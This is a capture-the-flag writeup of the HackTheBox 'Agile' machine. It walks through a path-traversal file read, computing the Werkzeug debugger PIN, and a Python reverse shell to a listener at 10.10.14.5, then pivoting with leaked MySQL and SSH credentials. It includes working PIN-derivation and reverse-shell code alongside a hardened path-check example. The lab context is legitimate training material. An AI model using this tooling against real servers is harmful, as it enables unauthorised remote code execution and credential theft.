HackTheBox Agile Writeup

Ryan Runako
MII Cyber Security Consulting Services

--

Hello, I want to share how I solved the HackTheBox Agile box. This box is fun and quite complicated, but at the moment I only have the user flag; I will continue working on the root flag when I have more free time :)

Information Gathering

The first step is an Nmap scan to enumerate open ports and the domain name. The only open ports are 22 (SSH) and 80 (HTTP).

Add the domain name superpass.htb to the local hosts file (/etc/hosts) on Kali Linux.

Next, scan the web directories with gobuster; this found nothing interesting.

Next I explored the whole website and created an account.

I found that the download directory returns an error page, which reveals that the Python libraries live in /app/venv/lib/python3.10/ and that the site is a Flask application.

The same error page shows that the Werkzeug debugger console can be opened for RCE, but it is locked with a PIN, so let's keep this clue for later.

While continuing to explore the site, I tried the export button.

In Burp we can see that the fn= parameter is used to fetch a file.

Exploit

Local File Inclusion

Next I tried directory traversal to read /etc/passwd, and the server returned its contents, proving that the traversal works and that we can read arbitrary files on the server. From /etc/passwd we get the user names with a bash login shell, such as edwards, corum, and dev_admin; keep this information.
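To make the bug concrete, here is an added example (my code, not the Agile application's source, which the page does not show) of an export handler that passes fn= straight into a path join, next to a hardened version that canonicalises the path and refuses anything outside the export directory. It also includes a small helper that pulls the bash-capable accounts out of a /etc/passwd returned by the traversal. The export directory /app/exports and the passwd lines are constructed assumptions.

```python
import os

# Assumed export directory for the illustration; the real layout of the box is
# not shown on the page.
BASE_DIR = "/app/exports"


def unsafe_export_path(fn: str) -> str:
    """How a traversal-prone handler resolves fn=: a plain join, so '../'
    segments walk out of BASE_DIR and an absolute fn replaces it entirely."""
    return os.path.normpath(os.path.join(BASE_DIR, fn))


def safe_export_path(fn: str) -> str:
    """Hardened resolution: canonicalise (symlinks included) and refuse any
    result that is not inside BASE_DIR."""
    base = os.path.realpath(BASE_DIR)
    target = os.path.realpath(os.path.join(base, fn))
    # commonpath compares whole path components, so /app/exports-old is not
    # accepted as a child of /app/exports the way a startswith() check would.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"refusing to serve {fn!r}: resolves outside {base}")
    return target


def bash_users(passwd_text: str) -> list:
    """Names of accounts whose login shell is bash, from /etc/passwd content."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] == "/bin/bash":
            users.append(fields[0])
    return users


# Constructed sample of what the traversal response might contain (not the
# box's real /etc/passwd).
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
edwards:x:1000:1000::/home/edwards:/bin/bash
corum:x:1001:1001::/home/corum:/bin/bash
dev_admin:x:1002:1002::/home/dev_admin:/bin/bash
"""

if __name__ == "__main__":
    payload = "../../../../etc/passwd"
    print("unsafe ->", unsafe_export_path(payload))
    try:
        safe_export_path(payload)
    except ValueError as err:
        print("safe   ->", err)
    print("bash users:", bash_users(SAMPLE_PASSWD))
```

The hardened version resolves symlinks before comparing, which matters when the export directory itself contains links; a check done on the un-resolved string would pass a link that points outside the directory.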

Cracking the Werkzeug Console PIN

So back to the interesting part: cracking the Werkzeug console PIN. I tried to follow the steps from https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug, but I still could not get the right PIN, because the configuration of every Flask app is different. After many trials and errors, I figured out how to crack the console PIN.

I used the exploit template from https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/werkzeug

What I need now are the following parameters: username, modname, app name (class name), the absolute path of app.py, the MAC address, the machine-id, and the cgroup.

Public Bits

Username
To get the username, read /proc/self/environ to see which user started Flask: www-data

Modname
flask.app is the Flask module name.

Name
I got this parameter from the file referenced in the traceback error page; the app name is found where DebuggedApplication is called in that file.

App.py path
The path can be taken from the traceback error page, which shows the Python script path; this is the absolute path of Flask's app.py.

Private Bits

1st private bit
To get the first private bit, first find the network interface from /proc/net/arp.

Then get the MAC address from /sys/class/net/{interface from the previous step}/address.

Then convert the MAC address to a decimal integer with Python, because the exploit script takes the first private bit in that form.

2nd private bit
This variable is the concatenation of the machine-id and the cgroup, which is how the exploit script builds it.

Get the machine-id (it is read from /etc/machine-id).

For the cgroup, take the first line of /proc/self/cgroup.

Then a little reverse engineering of the Werkzeug debugger shows which part of that cgroup line is actually used; I did this with code I found on YouTube.

Then pass all the values gathered in the steps above to the exploit script to generate the Werkzeug console PIN.

The exploit script gave me the PIN 339-183-899 to open the Werkzeug console, and the PIN is correct.
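As an added example (my reimplementation of Werkzeug 2.x's get_pin_and_cookie_name and get_machine_id from werkzeug/debug/__init__.py, not the HackTricks template or the author's script), the code below computes the PIN from the public and private bits gathered in the steps above. It spells out the two details that usually break copy-pasted templates: the MAC is hashed as its decimal integer string, and only the text after the last "/" of the first /proc/self/cgroup line is appended to the machine-id. Every input value in example_pin() is a constructed placeholder, not what the traversal returned on Agile; substitute the real values.

```python
"""Werkzeug 2.x debugger PIN derivation, reimplemented so it can be fed values
read through the LFI instead of values taken from the local host."""
import hashlib
from itertools import chain


def mac_to_decimal(mac: str) -> int:
    """Werkzeug hashes str(uuid.getnode()), i.e. the MAC as a decimal integer,
    so '00:50:56:b9:7d:0b' must become 345052380427 before hashing."""
    return int(mac.strip().replace(":", "").replace("-", ""), 16)


def machine_id_bits(machine_id_line: str, cgroup_first_line: str) -> bytes:
    """Mirror get_machine_id(): the stripped /etc/machine-id line followed by
    whatever comes after the LAST '/' of the FIRST line of /proc/self/cgroup
    (e.g. 'example.service' out of '0::/system.slice/example.service')."""
    linux = machine_id_line.strip().encode()
    linux += cgroup_first_line.strip().encode().rpartition(b"/")[2]
    return linux


def werkzeug_pin(username, modname, app_name, app_path, mac, machine_id):
    """Return (pin, cookie_name) the way the debugger derives them."""
    probably_public_bits = [username, modname, app_name, app_path]
    private_bits = [str(mac_to_decimal(mac)), machine_id]

    h = hashlib.sha1()  # Werkzeug < 2.0 used hashlib.md5() here
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")
    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    h.update(b"pinsalt")  # same hash object, continued
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

    # 9 digits are grouped 3 x 3 (5 and 4 do not divide 9), hence the
    # xxx-xxx-xxx shape of the PIN in the writeup.
    for group_size in (5, 4, 3):
        if len(num) % group_size == 0:
            pin = "-".join(num[x:x + group_size].rjust(group_size, "0")
                           for x in range(0, len(num), group_size))
            break
    else:
        pin = num
    return pin, cookie_name


def example_pin():
    """Constructed placeholder inputs: replace each with the value the
    traversal actually returned."""
    machine_id = machine_id_bits(
        "a1b2c3d4e5f60718293a4b5c6d7e8f90\n",   # /etc/machine-id (made up)
        "0::/system.slice/example.service\n",     # first line of /proc/self/cgroup (made up)
    )
    return werkzeug_pin(
        username="www-data",                      # from /proc/self/environ
        modname="flask.app",
        app_name="Flask",                         # from the traceback (assumed here)
        app_path="/app/venv/lib/python3.10/site-packages/flask/app.py",  # assumed
        mac="00:50:56:b9:7d:0b",                  # /sys/class/net/<iface>/address (made up)
        machine_id=machine_id,
    )


if __name__ == "__main__":
    pin, cookie = example_pin()
    print("PIN:", pin, " cookie name:", cookie)
```

Two caveats when using this against a real target: check the Werkzeug version in the venv, because releases before 2.0 used MD5 rather than SHA-1 for the same construction, and be careful with guesses, since the debugger stops accepting PINs after more than ten failed attempts until the server process restarts.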

Remote Code Execution

Now let's get a reverse shell! First start the netcat listener.

To get a shell out of the console (which runs inside the venv), I used the Python one-liner reverse shell from https://rcenetsec.com/reverse-shell-one-liner-how-to-do-it/

And I got a low-privilege www-data shell inside the venv.
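The console executes Python inside the application's process, so the connect-back shell is Python too. As an added example (my code, not the linked one-liner and not the author's), the function below does what such a one-liner does: it attaches a shell's stdin, stdout and stderr to a TCP connection back to the listener. A loopback helper lets you confirm the mechanics against a local listener before pasting the collapsed form into the console. The listener address 10.10.14.5:4444 in the one-liner is an assumption; use your own VPN IP and port.

```python
import socket
import subprocess
import threading


def reverse_shell(host: str, port: int, shell=("/bin/sh", "-i")) -> int:
    """Connect back to host:port and run `shell` with all three standard
    streams on the socket. subprocess accepts any object with fileno(), so the
    socket can be passed directly; this is the readable form of the usual
    os.dup2(s.fileno(), 0/1/2) one-liner. Returns the shell's exit status."""
    with socket.create_connection((host, port)) as s:
        return subprocess.call(list(shell), stdin=s, stdout=s, stderr=s)


# The same thing collapsed to one line for the Werkzeug console prompt.
# 10.10.14.5:4444 is an assumed listener (your `nc -lvnp 4444`), not a real one.
ONE_LINER = (
    'import socket,subprocess;s=socket.create_connection(("10.10.14.5",4444));'
    'subprocess.call(["/bin/sh","-i"],stdin=s,stdout=s,stderr=s)'
)


def loopback_demo(command: str, timeout: float = 10.0) -> str:
    """Start a throwaway listener on 127.0.0.1, point reverse_shell() at it
    with a single command instead of an interactive shell, and return what the
    listener received. Useful for checking the technique offline."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    received = []

    def listener():
        conn, _ = srv.accept()
        with conn:
            while True:
                chunk = conn.recv(4096)
                if not chunk:      # EOF once the shell exits and the socket closes
                    break
                received.append(chunk)

    t = threading.Thread(target=listener, daemon=True)
    t.start()
    reverse_shell("127.0.0.1", port, ["/bin/sh", "-c", command])
    t.join(timeout)
    srv.close()
    return b"".join(received).decode()


if __name__ == "__main__":
    print(loopback_demo("id; echo from-reverse-shell"), end="")
```

On the target the interactive form ("/bin/sh", "-i") is what you want; the loopback helper runs a single command only so that it terminates on its own.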

Privilege Escalation

The next step is to enumerate everything on the machine. While enumerating with the low-privilege shell, I found from the running services that MySQL is running.

I found the SQL credentials in /app/config_prod.json:

Username: superpassuser
Password: dSA6l7q*yIVs$39Ml6ywvgK

Then, use the credentials above to enumerate the MySQL databases.

From the passwords table I got some credentials and tried SSH with:
username: corum
password: 5db7caa1d13cc37c9fc2

Horizontal Privilege Escalation

Using the SSH credentials above, I successfully logged in to the corum account and finally got the user flag.
